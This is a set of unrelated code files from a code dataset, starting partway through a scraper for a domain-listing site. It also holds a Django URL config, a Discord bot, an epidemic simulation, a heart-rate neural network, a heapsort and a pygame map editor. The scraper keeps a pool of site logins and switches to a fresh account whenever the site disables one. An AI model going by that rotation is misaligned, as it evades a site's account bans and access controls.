self.REFRESH_TIME\n self.login(force=True)\n else:\n time.sleep(self.SLEEP_TIME)\n\n res_df = pd.DataFrame(res)\n res_df.to_csv(self.OUTPUT_FILE, mode='a', header=False, index=False)\n res = res_\n break\n\n self.info('Added %d domains for %s' % (added_count, date))\n return added_count\n\n def get_key(self, bad=False, random=True):\n self.info('Getting key... Random: %r' % (random))\n df_ = pd.read_csv(self.keys_file)\n if bad:\n df_.loc[df_['login'] == self.DATA['login'], 'blocked'] = 1\n df_.to_csv(self.keys_file, index=False)\n not_blocked = df_[df_['blocked'] == 0]\n if len(not_blocked) < 1:\n print('No active accounts left')\n return False\n df_1 = not_blocked.sample(n=1)\n self.DATA['login'] = df_1.iloc[0].login\n self.DATA['password'] = df_1.iloc[0].password\n\n def login(self, force=False, get_key=True):\n self.info('Login attempt')\n if get_key:\n self.get_key()\n if not force and self.is_logged():\n self.info('Already logged in')\n return True\n session = self.session\n data = self.DATA\n account_blocked = False\n for i in range(self.TRIES_COUNT):\n try:\n self.info('Trying to login as %s' % (data.get('login')))\n\n r = session.post(self.LOGIN_URL, data=data)\n\n if r.text.find('account was disabled') != -1 or r.text.find('need to activate') != -1:\n print('Account %s is blocked :(' % (data.get('login')))\n account_blocked = True\n\n if r.text.find('Logout') != -1:\n self.info('Successful login to %s' % (self.NAME))\n self.session = session\n # Make some calls\n with open(self.cookies_file, 'wb') as f:\n pickle.dump(utils.dict_from_cookiejar(session.cookies),\n f)\n return True\n self.warn('Cannot login to %s' % (self.NAME))\n except Exception as e:\n self.warn(e)\n self.warn('Cannot login to %s' % (self.NAME))\n if get_key or account_blocked:\n self.get_key(bad=account_blocked)\n account_blocked = False\n\n self.error('Even %d tries didnt help' % (self.TRIES_COUNT))\n return False\n\n def is_logged(self):\n session = self.session\n with open(self.cookies_file, 'rb') as f:\n cookie_dict = pickle.load(f)\n cookies = utils.cookiejar_from_dict(cookie_dict)\n session.cookies = cookies\n r = session.get(self.LOGIN_URL)\n if r.text.find('Logout') != -1:\n self.info('Successful login to %s' % (self.NAME))\n self.session = session\n return True\n return False\n\n def set_columns(self):\n df_ = pd.read_csv(self.keys_file)\n self.keys = df_[df_['check'] == 0]\n params = {\n 'viewfields[]': self.viewfields,\n 'save': ''\n }\n data = parse.urlencode(params)\n headers = {\n 'User-Agent': settings.USER_AGENT,\n 'Host': 'member.expireddomains.net',\n 'Origin': 'https://member.expireddomains.net',\n 'Referer': ':https//member.expireddomains.net/account/columnmanager/',\n }\n for idx, row in self.keys.iterrows():\n self.info('Setting columns for %s:%s' % (row.login,\n row.password))\n self.DATA['login'] = row.login\n self.DATA['password'] = row.password\n self.login(force=True, get_key=False)\n session = self.session\n session.headers = headers\n session.get(self.COLUMN_URL)\n r = session.post(self.COLUMN_URL, data=data)\n if r and r.status_code == 200:\n self.info('Successfuly set columns')\n df_.check[idx] = 1\n df_.to_csv(self.keys_file, index=False)\n","sub_path":"scraper/domain/expireddomains.py","file_name":"expireddomains.py","file_ext":"py","file_size_in_byte":9819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"304284776","text":"\"\"\"boneweb URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.home, name='home'),\n url(r'^about/$', views.about, name='about'),\n url(r'^residents/$', views.residents, name='residents'),\n url(r'^residents/([0-9]{4})/$', views.residents_by_year, name='residents_by_year'),\n url(r'^residents/alumni/$', views.alumni, name='alumni'),\n url(r'^quotes/$', views.quotes, name='quotes')\n #url(r'^residents/([0-9]{4})/([A-Za-z0-9]+)/$', views.resident, name='resident'),\n #url(r'^residents/([0-9]{4})/([A-Za-z0-9]+)/image$', views.resident_image, name='resident_image'),\n]\n","sub_path":"bone/boneweb/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"643998745","text":"# -*- coding:utf-8 -*-\n\nimport os\n\ncur_dir = os.path.dirname(os.path.abspath(__file__))\n\nimg_dir = os.path.join(cur_dir, 'images')\n\nstyle_dir = os.path.join(cur_dir, 'images', 'styles')\n\n\ndef get_styles():\n styles = []\n for file_name in os.listdir(style_dir):\n if os.path.isfile(os.path.join(style_dir, file_name)):\n styles.append(os.path.join(style_dir, file_name))\n return styles\n\n\nclass Config(object):\n iterations = 1000 # 迭代计算次数,500~1000效果好\n network = os.path.join(cur_dir, 'imagenet-vgg-verydeep-19.mat')\n content = os.path.join(img_dir, 'girl.jpg') # 需要添加指定风格,需要渲染的文件\n styles = [os.path.join(style_dir, '1-style.jpg')] or get_styles() # 风格文件list\n filepath, tempfilename = os.path.split(content)\n shotname, extension = os.path.splitext(tempfilename)\n output = os.path.join(img_dir, '{}_output{}'.format(shotname, extension)) # 输出文件名\n\n # network=os.path.join()\n\n @classmethod\n def as_dict(cls):\n _d = {k: v for k, v in cls.__dict__.items() if not k.startswith('_')}\n return _d\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"574108618","text":"import os\nimport discord\nfrom discord.ext import commands\nfrom discord.ext.commands import CommandNotFound\nfrom dotenv import load_dotenv\n\n\nload_dotenv()\nTOKEN = os.environ['DiscordBotToken']\nPREFIX = os.environ['DiscordBotPrefix']\n\nclient = commands.Bot(command_prefix=PREFIX, case_insensitive=True)\n\n\n@client.event\nasync def on_ready():\n await client.change_presence(status=discord.Status.online, activity=discord.Game('Walter'))\n print('Bot Has Successfully Started')\n\n\n# LOAD, UNLOAD AND RELOAD INDIVIDUAL COGS\n# @client.command()\n# async def load(ctx, extension):\n# client.load_extension(f'Cogs.{extension}')\n\n\n# @client.command()\n# async def unload(ctx, extension):\n# client.unload_extension(f'Cogs.{extension}')\n\n# @client.command()\n# async def reload(ctx, extension):\n # client.unload_extension(f'Cogs.{extension}')\n # client.load_extension(f'Cogs.{extension}')\n\n\n# Command Not Found Error\n@client.event\nasync def on_command_error(ctx, error):\n if isinstance(error, CommandNotFound):\n return\n raise error\n\n\n# Loads all Cog files on start\nfor filename in os.listdir('./Cogs'):\n if filename.endswith('.py'):\n client.load_extension(f'Cogs.{filename[:-3]}')\n\n\nclient.run(TOKEN)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"337309103","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Nov 23 17:02:17 2020\r\n\r\n@author: bwhit\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\n\r\nThis is a temporary script file.\r\n\"\"\"\r\nimport matplotlib.pyplot as plt\r\n#import seaborn as sns\r\nimport random\r\nimport numpy as np\r\n\r\nclass World:\r\n def __init__(self, population, sizex, sizey):\r\n self.contact_distance = 5\r\n self.transmission_rate = 0.1\r\n self.recovery_period = 1\r\n self.incubation_period = 1\r\n self.reset_period = 1\r\n \r\n self.sizex = sizex\r\n self.sizey = sizey\r\n self.health = (\"susceptible\", \"exposed\", \"infectious\", \"recovered\")\r\n self.population = population\r\n self.people = list()\r\n self.init_population()\r\n self.init_distance()\r\n \r\n def init_population(self):\r\n for person in range(self.population):\r\n x = random.uniform(0, self.sizex)\r\n y = random.uniform(0, self.sizey)\r\n status = self.health[0]\r\n \r\n self.people.append([person, x, y, status, 0])\r\n \r\n def init_distance(self):\r\n self.distance_matrix = np.zeros([self.population, self.population])\r\n iteration = 0\r\n for index1 in range(self.population):\r\n #print(\"Iteration\", iteration)\r\n person1 = self.people[index1]\r\n x1 = person1[1]\r\n y1 = person1[2]\r\n for index2 in range(self.population):\r\n person2 = self.people[index2]\r\n x2 = person2[1]\r\n y2 = person2[2]\r\n distance = np.sqrt((x1-x2)**2 + (y1-y2)**2)\r\n self.distance_matrix[index1, index2] = distance\r\n iteration = iteration+1\r\n \r\n def infect_random(self, number):\r\n for k in range(number):\r\n #infect one random person between [1, self.population]\r\n person = random.randint(0, self.population-1)\r\n self.people[person][3] = \"infectious\"\r\n self.initial_infection = number\r\n \r\n def update(self):\r\n self.people_update = self.people.copy()\r\n for index1 in range(self.population):\r\n num_days = self.people_update[index1][4]\r\n status = self.people_update[index1][3]\r\n if status == \"exposed\":\r\n num_days = num_days + 1\r\n if num_days >= self.incubation_period:\r\n #print(num_days)\r\n self.people_update[index1][3] = \"infectious\"\r\n self.people_update[index1][4] = 0\r\n else:\r\n self.people_update[index1][4] = num_days\r\n if status == \"infectious\":\r\n num_days = num_days + 1\r\n if num_days >= self.recovery_period:\r\n self.people_update[index1][3] = \"recovered\"\r\n self.people_update[index1][4] = 0\r\n else:\r\n self.people_update[index1][4] = num_days\r\n if status == \"recovered\":\r\n num_days = num_days + 1\r\n if num_days >= self.reset_period:\r\n self.people_update[index1][3] = \"susceptible\"\r\n self.people_update[index1][4] = 0\r\n \r\n if status == \"infectious\":\r\n for index2 in range(self.population):\r\n if index1 != index2:\r\n distance = self.distance_matrix[index1, index2]\r\n status2 = self.people_update[index2][3]\r\n if status2 == \"susceptible\":\r\n if distance <= self.contact_distance:\r\n number = random.uniform(0, 1)\r\n if number <= self.transmission_rate:\r\n self.people_update[index2][3] = \"exposed\"\r\n self.people = self.people_update\r\n\r\n#VARIABLES\r\nnum_people = 5000\r\nsizex = 50\r\nsizey = 50\r\n\r\nworld = World(num_people, sizex, sizey)\r\n\r\nx = list()\r\ny = list()\r\n\r\nstats = list()\r\n\r\ninitial_infection = 2\r\nworld.infect_random(initial_infection)\r\n\r\nfor k in range(20):\r\n num_susceptible = 0\r\n num_exposed = 0\r\n num_infectious = 0\r\n num_recovered = 0\r\n for person in world.people:\r\n x.append(person[1])\r\n y.append(person[2])\r\n status = person[3]\r\n \r\n if status == \"susceptible\":\r\n color = \"yellow\"\r\n num_susceptible = num_susceptible + 1\r\n elif status == \"exposed\":\r\n color = \"orange\"\r\n num_exposed = num_exposed + 1\r\n elif status == \"infectious\":\r\n color = \"purple\"\r\n num_infectious = num_infectious + 1\r\n else: #recovered\r\n color = (0.08, 0.706, 0.455)\r\n num_recovered = num_recovered + 1\r\n \r\n plt.plot(x[-1], y[-1], 'o', color = color)\r\n \r\n plt.grid(color='lightblue', alpha=0.5)\r\n plt.xlim([0,world.sizex])\r\n plt.ylim([0,world.sizey])\r\n \r\n plt.title(k+1)\r\n \r\n plt.show()\r\n \r\n world.update()\r\n stats.append([k, num_susceptible, num_exposed, num_infectious, num_recovered])\r\n #print(\"Susceptible, Exposed, Infectious, Recovered\")\r\n #print(num_susceptible, num_exposed, num_infectious, num_recovered)\r\n\r\nstatsarray = np.array(stats)\r\nplt.plot(statsarray[:,0], statsarray[:,1], label=\"Susceptible\", color=\"gold\")\r\nplt.plot(statsarray[:,0], statsarray[:,2], label=\"Exposed\", color=\"red\")\r\nplt.plot(statsarray[:,0], statsarray[:,3], label=\"Infectious\", color=\"purple\")\r\nplt.plot(statsarray[:,0], statsarray[:,4], label=\"Recovered\", color=\"green\")\r\nplt.legend()\r\nplt.grid(color = \"lightblue\", alpha = 0.5)\r\nplt.xlabel(\"Days\")\r\nplt.ylabel(\"Number of People\")\r\nplt.title(\"SIS Model\")\r\nplt.xlim([0,None])\r\nplt.ylim([0,None])\r\nplt.show()","sub_path":"SISModel.py","file_name":"SISModel.py","file_ext":"py","file_size_in_byte":5835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"117059195","text":"from tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Dense, Flatten,ReLU,BatchNormalization,Activation\nfrom tensorflow.keras.layers import SimpleRNN, Embedding, LSTM,Reshape\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Input\nfrom tensorflow.keras.utils import plot_model\nimport tensorflow as tf\nimport os\nimport glob\nimport pandas as pd\nimport dlib\nimport cv2 as cv\nimport numpy as np\nfrom PIL import Image\nimport matplotlib.pyplot as plt\n\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2'\n#모델\n\n\n\nmaximum = 0\nminimum = 200\nHR1 = []\nfor index in range(1,700):\n path_txt = glob.glob('./folder'+str(index)+'/*.csv')\n for i in path_txt:\n df = pd.read_csv(i, encoding='utf-8')\n maximum = max(max(df.loc[:,\"PULSE\"]),maximum)\n if maximum == 167 : print(index)\n minimum = min(min(df.loc[:,\"PULSE\"]),minimum)\n temp = df.loc[:, \"PULSE\"]\n HR1.append(temp)\nHR1 = np.array(HR1)\nHR_mean = HR1.mean()\nprint(maximum,minimum,HR_mean)\n\n#def My_Customized_Loss(y_true, y_pred):\n # return tf.math.reduce_mean(tf.abs(y_pred - HR_mean),axis=-1)\n\n'''\ninput = Input(batch_input_shape=(1, 25, 30, 3))\nCNN = Conv2D(filters=32, kernel_size=(3, 3), padding='same')(input)\nCNN = BatchNormalization()(CNN)\nCNN = Activation('relu')(CNN)\nCNN = Conv2D(filters=32, kernel_size=(3, 3), padding='same')(CNN)\nCNN = BatchNormalization()(CNN)\nCNN = Activation('relu')(CNN)\nCNN = MaxPooling2D(strides=2)(CNN)\nCNN = Conv2D(filters=64, kernel_size=(3, 3), padding='same')(CNN)\nCNN = BatchNormalization()(CNN)\nCNN = Activation('relu')(CNN)\nCNN = MaxPooling2D(strides=2)(CNN)\nCNN = Conv2D(filters=128, kernel_size=(3, 3), padding='same')(CNN)\nCNN = BatchNormalization()(CNN)\nCNN = Activation('relu')(CNN)\nCNN = MaxPooling2D(strides=2)(CNN)\nCNN = Reshape((1, 1152))(CNN)\n# RNN = Embedding(input_dim=256,output_dim=64)(CNN)\nRNN = LSTM(64, return_sequences=True, stateful=True)(CNN)\n# RNN=Activation('relu')(RNN)\nRNN = Dense(1)(RNN)\nmodel = Model(inputs=input, outputs=RNN)\nmodel = Model(inputs=input, outputs=RNN)\nmodel.compile(optimizer='sgd', loss=tf.keras.losses.MAE, metrics=[tf.keras.metrics.RootMeanSquaredError()])\nmodel.compile(optimizer='sgd', loss='mse', metrics=[tf.keras.metrics.RootMeanSquaredError()])\n# model.compile(optimizer='sgd',loss='mse',metrics=['mae'])\nprint(model.layers[17])\n\n\nfor index in range(1,700):\n #if index == 66:\n # continue\n HR=[]\n path_txt = glob.glob('./folder'+str(index)+'/*.csv')\n if not path_txt :\n print(\"No folder\"+str(index))\n continue\n print(path_txt)\n path_picture = glob.glob('./folder'+str(index)+'/*.PNG')\n for i in path_txt:\n df = pd.read_csv(i, encoding='utf-8')\n #maximum = max(df.loc[:,\"PULSE\"])\n #minimum = min(df.loc[:,\"PULSE\"])\n #print(df.loc[:,\"PULSE\"])\n #print(maximum, minimum)\n df.loc[:, \"PULSE\"] = (df.loc[:, \"PULSE\"] - minimum) / (maximum - minimum) # Min = 40, Max = 150 설정\n df.loc[:, \"SPO2\"] = df.loc[:, \"SPO2\"] / 100 # 0 ~ 1.00 으로 Normalization\n temp = df.loc[:,\"PULSE\"]\n SpO2 = df.loc[:,\"SPO2\"]\n HR.append(temp)\n HR=np.array(HR)\n\n\n #print(HR[0:40])\n #print(HR[0:40])\n\n x_data=[]\n for i in path_picture:\n #print(i)\n image = cv.imread(i)\n #print(image)\n x_data.append(image)\n if len(x_data) !=40 :\n print(\"No x_data size is 40\")\n continue;\n x_data = np.array(x_data)\n #print(np.array(x_data).shape)\n #x_train = x_data[0:30]\n #y_train = HR[:,0:30]\n #x_val = x_data[30:40]\n #y_val = HR[:,30:40]\n #y_train=y_train.reshape(-1,1)\n #y_val=y_val.reshape(-1,1)\n HR = HR.reshape(-1,1)\n print(x_data.shape)\n print(HR)\n #print(y_train)\n #print(y_val)\n #print(x_train.shape)\n #print(y_train.shape)\n #print(x_train)\n #print(y_train)\n #print(np.array(x_train).shape)\n #print(y_train.shape)\n #print(HR[30:40])\n #print(np.array(x_train[0]))\n #print(x_data)\n for epoch in range(50):\n print(index, epoch)\n model.fit(x_data,HR,batch_size=1,shuffle=False)\n #print(\"---------------------------------------------------------------\")\n #print(model.layers[17].states)\n #print(\"**************************************************************\")\n model.layers[17].reset_states()\n #print(model.layers[17].states)\n\n #print(x_data.shape,HR.shape)\n #print(x_train.shape, y_train.shape)\n #print(x_val.shape, y_val.shape)\n#for epoch in range(epochs):\n #for idx in range(11):\n\nmodel.summary()\n #from tensorflow.keras.utils import plot_model\n\nprint(type(model.layers[17]))\n\n#from keras.models import load_model\n\nmodel.save('epoch_50_Model_Total_700_min_max_normalization_max_is_140.h5')\ndel model\n'''\n#from keras.models import load_model\ntest=490\nmodel = tf.keras.models.load_model('epoch_50_Model_Total_700_min_max_normalization_max_is_140.h5')\nprint(\"--------------test----------------\")\npath_txt = glob.glob('./folder'+str(test)+'/*.csv')\nprint(path_txt)\nHR=[]\nfor i in path_txt:\n df = pd.read_csv(i, encoding='utf-8')\n #df.loc[:, \"PULSE\"] = (df.loc[:, \"PULSE\"] - 40) / (150 - 40) # Min = 40, Max = 150 설정\n df.loc[:, \"SPO2\"] = df.loc[:, \"SPO2\"] / 100 # 0 ~ 1.00 으로 Normalization\n temp = df.loc[:, \"PULSE\"]\n SpO2 = df.loc[:, \"SPO2\"]\n HR.append(temp)\nHR = np.array(HR)\nHR = HR.reshape(-1,1)\n\npath_picture = glob.glob('./folder'+str(test)+'/*.PNG')\nprint(path_picture)\nx_data=[]\nfor i in path_picture:\n #print(i)\n image = cv.imread(i)\n #print(image)\n x_data.append(image)\nif len(x_data) !=40 :\n print(\"No x_data size is 40\")\nx_data = np.array(x_data)\nimport math\ny_prediction = model.predict(x_data).flatten()\ny_prediction = y_prediction*(maximum-minimum) + minimum\nprint(\"예측\")\nprint(y_prediction)\nprint(\"측정\")\nprint(HR.flatten())\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n#plt.plot(index.value)\nplt.xlim(0,40)\nplt.ylim(40,150)\n\nplt.plot(y_prediction,lw=1.5,label=\"Prediction\")\nplt.plot(HR,lw=1.5,label=\"Heart Rate\")\nplt.legend()\nplt.xlabel('Second')\nplt.ylabel('Heart Rate')\nplt.grid(True)\nplt.title('HR Estimation')\n\nplt.show()","sub_path":"model_hr.py","file_name":"model_hr.py","file_ext":"py","file_size_in_byte":6244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"591400952","text":"\"\"\"\nAuthor: Wenhua Yang\nDate: 09/27/2016\n\"\"\"\n\nimport os\nfrom scrapy.http import TextResponse, Request\n\n\ndef fake_response(file_name, url):\n request = Request(url=url)\n responses_dir = os.path.dirname(os.path.realpath(__file__))\n file_path = os.path.join(responses_dir, file_name)\n file_content = open(file_path, 'r').read()\n response = TextResponse(url=url, request=request, body=file_content,\n encoding='utf-8')\n return response\n","sub_path":"index-crawler/crawler/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"486369864","text":"def exch(pq, index1, index2):\n temp = pq[index1]\n pq[index1] = pq[index2]\n pq[index2] = temp\n\n\ndef sink(pq, index1, tail):\n while 2 * index1 <= tail:\n index2 = 2 * index1\n if index2 < tail and pq[index2] < pq[index2 + 1]:\n index2 += 1\n if pq[index2] < pq[index1]:\n break\n exch(pq, index1, index2)\n index1 = index2\n\n\n# use swim to implement heap sort may waste memory space\n# because we need to create a new list (array) to construct the heap\n# def swim(pq, key, tail):\n\n\ndef heapsort(nums):\n n = len(nums)\n nums.insert(0, 0)\n pq = nums\n for i in [n / 2 - j for j in range(n / 2)]:\n sink(pq, i, n)\n while n > 1:\n exch(pq, 1, n)\n n -= 1\n sink(pq, 1, n)\n","sub_path":"heapsort.py","file_name":"heapsort.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"88489108","text":"from functools import reduce\nimport bisect\n\ndef multi():\n return [lambda x : i*x for i in range(4)]\ndef multipliers():\n for i in range(4):\n yield lambda x: i *x\ndef out_(param):\n data=[]\n for i in multipliers():\n data.append(i)\n print(i(param))\n for j in data:\n print(j(param))\nif __name__ == '__main__':\n print(multi())\n print([m(3) for m in multi()])\n from collections import Counter\n res=map(lambda x:x*x,[y for y in range(3)])\n print(type(res))\n for i in res:\n print(type(i),i)\n print(list(res))\n ###############\n # out_(3)\n reduce(lambda x, y: x * y, range(1, 2))","sub_path":"others/bi_bao.py","file_name":"bi_bao.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"300425136","text":"import pygame\nimport pygame.freetype\nimport time\nimport sys\nimport random\n\npygame.init()\n\n ############################################################\n\nclass tile:\n def __init__(self, x, y, tileSize, color = (0, 255, 0)):\n self.x = x\n self.y = y\n self.tileSize = tileSize\n self.surface = pygame.Surface((tileSize, tileSize))\n pygame.draw.rect(self.surface, (0, 255, 0), (0, 0, tileSize, tileSize))\n self.surface = self.surface.convert()\n\n def show(self):\n screen.blit(self.surface, (self.x, self.y))\n\nclass Button:\n def __init__(self, x, y, tileSize, color, tileType):\n self.x = x\n self.y = y\n self.x1 = x\n self.y1 = y\n self.x2 = x + tileSize\n self.y2 = y + tileSize\n self.tileSize = tileSize\n self.tileType = tileType\n self.surface = pygame.Surface((tileSize, tileSize))\n self.color = color\n pygame.draw.rect(self.surface, color, (0, 0, tileSize, tileSize))\n self.surface = self.surface.convert()\n\n def show(self):\n screen.blit(self.surface, (self.x, self.y))\n\nclass winTile:\n def __init__(self, x, y, tileSize):\n self.x = x\n self.y = y\n self.tileSize = tileSize\n self.surface = pygame.Surface((tileSize, tileSize))\n pygame.draw.rect(self.surface, (150, 150, 255), (0, 0, tileSize, tileSize))\n self.surface = self.surface.convert()\n\n def show(self):\n screen.blit(self.surface, (self.x, self.y))\n\nclass startTile:\n def __init__(self, x, y, tileSize):\n self.x = x\n self.y = y\n self.tileSize = tileSize\n self.surface = pygame.Surface((tileSize, tileSize))\n pygame.draw.rect(self.surface, (255, 200, 200), (0, 0, tileSize, tileSize))\n self.surface = self.surface.convert()\n\n def show(self):\n screen.blit(self.surface, (self.x, self.y))\n\n ############################################################\n\ndef collision(obj, mousePos):\n if not((obj.x1 >= (mousePos[0])) and not(obj.x2 <= mousePos[0])) and not((obj.y1 >= mousePos[1]) and not(obj.y2 <= mousePos[1])):\n return True\n else:\n return False\n\n ############################################################\nmainloop = True\n\nscreenX = 640\nscreenY = 480\n\ntileSize = 40\ntotalRow = int(screenY / tileSize)\ntotalCol = int(screenX / tileSize)\nprint(totalRow)\nprint(totalCol)\n\n\npaintTiles = []\nspecialTiles = []\n\nfont = pygame.freetype.SysFont('Comic Sans MS', 30)\n\nscreen = pygame.display.set_mode((screenX, screenY))\n\nbackground = pygame.Surface(screen.get_size())\nbackground.fill((230, 230, 255))\nbackground = background.convert()\nscreen.blit(background, (0, 0))\n\nwallButton = Button(620, 30, 20, (200, 255, 200), \"w\")\nvictoryButton = Button(620, 55, 20, (200, 200, 255), \"v\")\nstartButton = Button(620, 80, 20, (255, 200, 200), \"s\")\nbuttons = [wallButton, victoryButton, startButton]\n\nmousePos = pygame.mouse.get_pos()\n\nsnapTile = tile(mousePos[0] - (mousePos[0] % tileSize), mousePos[1] - (mousePos[1] % tileSize), tileSize, (170, 220, 170))\n\ntileType = \"w\"\nstartPlaced = False\nvictoryPlaced = False\n\nwhile mainloop:\n\n typeChanged = False\n\n mousePos = pygame.mouse.get_pos()\n\n snapTile.x = mousePos[0] - (mousePos[0] % tileSize)\n snapTile.y = mousePos[1] - (mousePos[1] % tileSize)\n\n screen.blit(background, (0, 0))\n\n for block in paintTiles:\n block.show()\n\n\n if startPlaced:\n start.show()\n if victoryPlaced:\n win.show()\n\n snapTile.show()\n\n wallButton.show()\n victoryButton.show()\n startButton.show()\n\n font.render_to(screen, (30, 30), str(mousePos[0]), (0, 0, 0))\n font.render_to(screen, (30, 60), str(mousePos[1]), (0, 0, 0))\n font.render_to(screen, (30, 100), \"When finished, press 'r'\", (0, 0, 0))\n\n pygame.display.flip()\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n sys.exit()\n if event.key == pygame.K_r:\n mainloop = False\n elif event.type == pygame.MOUSEBUTTONUP:\n for button in buttons:\n if collision(button, mousePos):\n tileType = button.tileType\n typeChanged = True\n if not(typeChanged):\n if tileType == \"w\":\n paintTiles.append(tile(mousePos[0] - (mousePos[0] % tileSize), mousePos[1] - (mousePos[1] % tileSize), tileSize))\n elif tileType == \"v\":\n win = winTile(mousePos[0] - (mousePos[0] % tileSize), mousePos[1] - (mousePos[1] % tileSize), tileSize)\n victoryPlaced = True\n elif tileType == \"s\":\n start = startTile(mousePos[0] - (mousePos[0] % tileSize), mousePos[1] - (mousePos[1] % tileSize), tileSize)\n startPlaced = True\n\nmapString = \"\"\ntileFound = False\n\n\nfor r in range(totalRow):\n for c in range(totalCol):\n tileFound = False\n for block in paintTiles:\n if ((block.x == c * tileSize) and (block.y == r * tileSize) and not(tileFound)):\n mapString += \"w\"\n tileFound = True\n if ((win.x == c * tileSize) and (win.y == r * tileSize) and not(tileFound)):\n mapString += \"v\"\n tileFound = True\n if ((start.x == c * tileSize) and (start.y == r * tileSize) and not(tileFound)):\n mapString += \"s\"\n tileFound = True\n if not(tileFound):\n mapString += \" \"\n\n\nmapString += \"X\"\nprint(mapString)\nprint(len(mapString))\n\ncurrTile = 0\nscreen.blit(background, (0, 0))\n\ntiles = []\n\nfor r in range(totalRow):\n for c in range(totalCol):\n if mapString[c + (r * totalCol)] == \"w\":\n tiles.append(tile(c * tileSize, r * tileSize, tileSize))\n tiles[currTile].show()\n elif mapString[c + (r * totalCol)] == \"s\":\n start = startTile(c * tileSize, r * tileSize, tileSize)\n start.show()\n elif mapString[c + (r * totalCol)] == \"v\":\n win = winTile(c * tileSize, r * tileSize, tileSize)\n win.show()\n\n currTile += 1\n\npygame.display.flip()\nmainloop = True\n\nwhile mainloop:\n time.sleep(5)\n mainloop = False\n","sub_path":"Map Generator/Grid Layer.py","file_name":"Grid Layer.py","file_ext":"py","file_size_in_byte":6346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"156159994","text":"from __future__ import unicode_literals\nfrom uncertainties import *\nfrom converterNew import *\nfrom uncertainties import unumpy\nfrom uncertainties import *\nfrom uncertainties.umath import *\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport matplotlib\n\n##matplotlib.rcParams['text.usetex'] = True\n##matplotlib.rcParams['text.latex.unicode'] = True\nfrom matplotlib import rc\n#rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\n## for Palatino and other serif fonts use:\n#rc('font',**{'family':'serif','serif':['Palatino']})\nrc('text', usetex=True)\n\n#alle Graphen werden in Graphen gespeichert\nif not os.path.exists(\"Graphen\"):\n os.mkdir(\"Graphen\")\n\n#data enthält sämtliche Information\n#data = np.array(convert(\"messwerteText\"))\n\n#data = convert(\"test\")\n\ndata = convert(\"Wärmepumpe\")\n#datael=convert(\"Leistung\")\ndataf=convert(\"fehler\")\n#print(data[0])\n\nm1=ufloat(4.36, 0.02)\nm2=ufloat(4.28, 0.02)\nm3=ufloat(0.36, 0.02)\nt1=ufloat(304.7187, 0.03)\nt2=ufloat(308.3056, 0.03)\nt3=ufloat(281.0657, 0.03)\nt4=ufloat(277.2301, 0.03)\nHk=ufloat(175.04, 0.01)\nHh=ufloat(196.77,0.01)\n\nth=t2-t1\ntk=t3-t4\nmh=m1-m3\nmk=m2-m3\n\nmsh= (4182*th*mh)/(240.0 * Hh * 1000.0)\nprint(msh*60)\nmsk= (4182*tk*mk)/(240.0 * Hk * 1000.0)\nprint(msk*60)\nprint(mh)\nprint(mk)\nprint(tk)\nprint(th)\n\n#fehlerauswertung\ntimef = np.array(dataf[0],dtype=float) #ms\nChannel0f = np.array(dataf[8],dtype=float) #Kelvin\n#print(np.std(Channel0f)) #ca 0.03 Kelvin\n#timef=timef[0:500:]\n#Channel0f=Channel0f[0:500:]\n\n#temperatur auswertung\ntime = np.array(data[0],dtype=float) #ms\nChannel2 = np.array(data[3],dtype=float) #Kelvin\ntime=time[0::60]\nChannel2 =Channel2[0::60]\n\nChannel4 = np.array(data[5],dtype=float) #Kelvin\ntime=time[0::60]\nChannel4 =Channel4[0::60]\n\n#print(time/60)\n#print(Channel4)\n\n#time1 = np.array(data[0],dtype=float)\n#time=time[0::5]\n#Ufuse = np.array(data[2], dtype=float)\n#Ufuse=Ufuse[0::5]\n#Ubat = np.array(data[1], dtype=float)\n#Ubat=Ubat[0::5]\n\n\n###################\n#n*lambda/2 mbar\np=[]\npu=940\np0=[680,650,620,590,560,520,500,470,430,400,370,340,290,240,210,160,120,90,60]\n\nfor i in range(len(p0)):\n 